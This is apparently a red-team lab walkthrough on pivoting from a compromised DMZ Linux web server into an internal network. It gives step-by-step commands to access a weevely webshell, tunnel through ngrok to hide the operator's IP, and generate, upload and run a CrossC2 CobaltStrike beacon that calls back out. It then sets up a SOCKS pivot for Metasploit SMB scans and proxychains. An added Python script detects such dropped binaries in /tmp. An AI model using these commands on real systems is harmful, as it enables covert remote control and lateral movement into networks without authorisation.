
# Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux

In this lab we will see how a simple webshell can be used to deploy a CobaltStrike beacon on a Linux target placed in a DMZ, and how to pivot through that machine into the internal network. This is a common scenario in my red teaming assessments, for instance when I find a flaw that permits uploading a webshell to the web server. Let's do it.

## Webshell - weevely

I often use weevely to deploy a webshell remotely. More information about this tool [**here**](https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#pivoting-with-weevely-via-webshell).

```bash
weevely generate <password> <path>
weevely <URL> <password> [cmd]
```

Example of how to access the target machine:

```bash
kali:> weevely http://target_system/evil.php my@password

[+] weevely 4.0.1

[+] Target:     target:/tmp
[+] Session:    /home/kali/.weevely/sessions/target/...
[+] Shell:      System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
target:/tmp $ 
```

At this point we have a remote connection to the target server. Now it's time to prepare ngrok and the CobaltStrike beacon so we can pivot into the internal network from our local machine.

## [ngrok](https://ngrok.com/)

In this step you can use a trusted machine (e.g., an AWS EC2 instance) or simply ngrok. ngrok is a very useful tool that exposes a local server through any NAT or firewall, and it also masks our public IP address, of course :nerd:

{% embed url="https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#ngrok" %}

We can use a configuration file as described in the link above, or simply run the following command to start a new TCP tunnel to local port 8083:

```bash
./ngrok tcp 8083
```

Now, it's time to create the CobaltStrike stager.

![](/files/-MXTUEx0rH_RPSBe3peS)

## [**CrossC2** ](https://github.com/gloxec/CrossC2)

The CrossC2 framework allows us to generate cross-platform CobaltStrike payloads, e.g., Linux x64 and x86 beacons.

We can create an x64 or x86 payload depending on the target system architecture.

**Tip**: use the `uname -a` command to check the target architecture.

* **ngrok_ip**: the IP address that the ngrok hostname resolves to.
* **ngrok_port**: the port assigned by ngrok to the tunnel.

```bash
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x86 ./cross
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x64 ./cross
```

![](/files/-MXTV6YyQ2GmAFaxMNwH)

The x64 payload was generated, and we can check it using the ***file*** command:

```bash
kali@kali:~/Desktop$ file cross
cross: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
```

Now, it's time to upload it into the target Linux webserver using weevely:

```bash
target:/tmp $ :file_upload /home/kali/Desktop/cross /tmp/cross
True
target:/tmp $
target:/tmp $ chmod +x cross
```
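From the defender's side, the artefacts this step leaves on the web server are easy to triage: an executable dropped in /tmp by the web server's user, which `file` reports as a statically linked ELF with no section header. The following Python is an added example, not code from the original post or from CrossC2/weevely: it parses the ELF64 header directly, the triage rule and the `sample_elf` bytes are constructed for the demo, and `/tmp` is only a default directory.

```python
import os, struct, sys

EH = struct.Struct("<16sHHIQQQIHHHHHH")  # ELF64 file header (little-endian), 64 bytes
PH = struct.Struct("<IIQQQQQQ")          # ELF64 program header, 56 bytes
ET_EXEC, EM_X86_64, PT_LOAD, PT_DYNAMIC, PT_INTERP = 2, 62, 1, 2, 3

def elf_info(data):  # parse a 64-bit little-endian ELF header; None for anything else
    if len(data) < EH.size or data[:4] != b"\x7fELF" or data[4:6] != b"\x02\x01":
        return None
    f = EH.unpack_from(data)
    e_type, e_machine, e_phoff, e_shoff, e_phentsize, e_phnum, e_shnum = (
        f[1], f[2], f[5], f[6], f[9], f[10], f[12])
    ptypes = set()
    for i in range(e_phnum):  # walk the program header table
        off = e_phoff + i * e_phentsize
        if off + PH.size <= len(data):
            ptypes.add(PH.unpack_from(data, off)[0])
    return {
        "exec": e_type == ET_EXEC,
        "x86_64": e_machine == EM_X86_64,
        "static": not ({PT_INTERP, PT_DYNAMIC} & ptypes),  # no interpreter, no dynamic segment
        "no_section_header": e_shoff == 0 or e_shnum == 0,  # what `file` reported above
    }

def looks_like_dropped_beacon(info):  # triage rule: static ET_EXEC with stripped section table
    return bool(info) and info["exec"] and info["static"] and info["no_section_header"]

def scan_dir(path="/tmp"):  # yield (path, info) for executable regular files matching the rule
    for e in os.scandir(path):
        try:
            if not e.is_file(follow_symlinks=False) or not e.stat().st_mode & 0o111:
                continue
            with open(e.path, "rb") as fh:
                info = elf_info(fh.read(65536))  # headers live at the start of the file
        except OSError:
            continue
        if looks_like_dropped_beacon(info):
            yield e.path, info

def sample_elf(static=True, stripped=True):  # constructed ELF64 header + one program header
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    shoff, shnum = (0, 0) if stripped else (EH.size + PH.size, 5)
    hdr = EH.pack(ident, ET_EXEC, EM_X86_64, 1, 0x401000, EH.size, shoff, 0,
                  EH.size, PH.size, 1, 0 if stripped else 64, shnum, 0)
    return hdr + PH.pack(PT_LOAD if static else PT_INTERP, 5, 0, 0x400000, 0x400000, 120, 120, 0x1000)

if __name__ == "__main__":
    for p, info in scan_dir(sys.argv[1] if len(sys.argv) > 1 else "/tmp"):
        print(p, info)
```

The rule is deliberately narrow (static, section-less ET_EXEC); legitimate software in world-writable directories rarely matches it, which keeps the hit list short.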

## Create CS Listener

The next step is to create the CS listener. We need to set our internal IP address in:

* **HTTPS HOSTS**
* **HTTPS HOST (STAGER)**

and, in **HTTPS PORT (C2)**, the local port (8083) to which the ngrok tunnel is mapped.

![](/files/-MXTXOyqkDn3wqTBFMDs)

After that, the payload can be executed from the weevely webshell:

```bash
./cross
```

And yeah, we got it :sunglasses:

![](/files/-MXTYRF6g-ba7TC3ZVym)

## Pivoting using CS

In the next phase, we will:

* **Create a SOCKS4 proxy**
* **Use Metasploit to pivot internally;** or
* **Take advantage of the proxychains tool** (my favorite approach) :space_invader:

Interacting with the new session, you have the following options:

![Socks commands were highlighted.](/files/-MXT_M-TuzI8-drlLwXl)

We can create the new SOCKS proxy from the CS console, or by clicking on the target machine.

![](/files/-MXT_t5o9hI81TCRPROf)

![](/files/-MXT_xdU4L3Ka-gA6EYB)

After clicking the **Launch** button, the SOCKS listener is created on the local (attacker) machine. We can confirm it with the following command:

```bash
netstat -antp | grep "LISTEN"
(...)
tcp6       0      0 :::14833                :::*                    LISTEN
```

### Metasploit for pivoting internally

From the **Proxy Pivots** menu we can get the command needed to pivot through MSF.

![](/files/-MXTb4qREpCcmECs1YwE)

With that command in hand, we start msfconsole, paste it to set up the new tunnel, and scan the hosts available on the internal network (note that `set` takes the option name and value separated by a space):

```bash
msfconsole
setg Proxies socks4:10.0.2.15:14833
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.0.0/24
run
```

### Take advantage of the proxychains tool

To use proxychains, we first need to add the new SOCKS proxy to the `/etc/proxychains.conf` file:

```bash
sudo vim /etc/proxychains.conf
```

Add the proxy to the `[ProxyList]` section at the end of the file:

```
socks4 10.0.2.15 14833
```

After that, many tools (crackmapexec, nmap, the impacket tools, and so on) can be run through the tunnel by prefixing them with proxychains:

```bash
proxychains nc 192.168.x.x 445 -v
```

## Bonus

**Creating CobaltStrike random C2 profile**

{% embed url="https://github.com/threatexpress/random_c2_profile?s=09" %}

**CobaltStrike C2 malleable profiles**

{% embed url="https://github.com/xx0hcd/Malleable-C2-Profiles" %}

## References

{% embed url="https://blog.cobaltstrike.com/2016/06/01/howto-port-forwards-through-a-socks-proxy/" %}

{% embed url="https://wh0ale.github.io/2019/12/11/VulnStack%E5%9F%9F%E7%8E%AF%E5%A2%83%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F/" %}
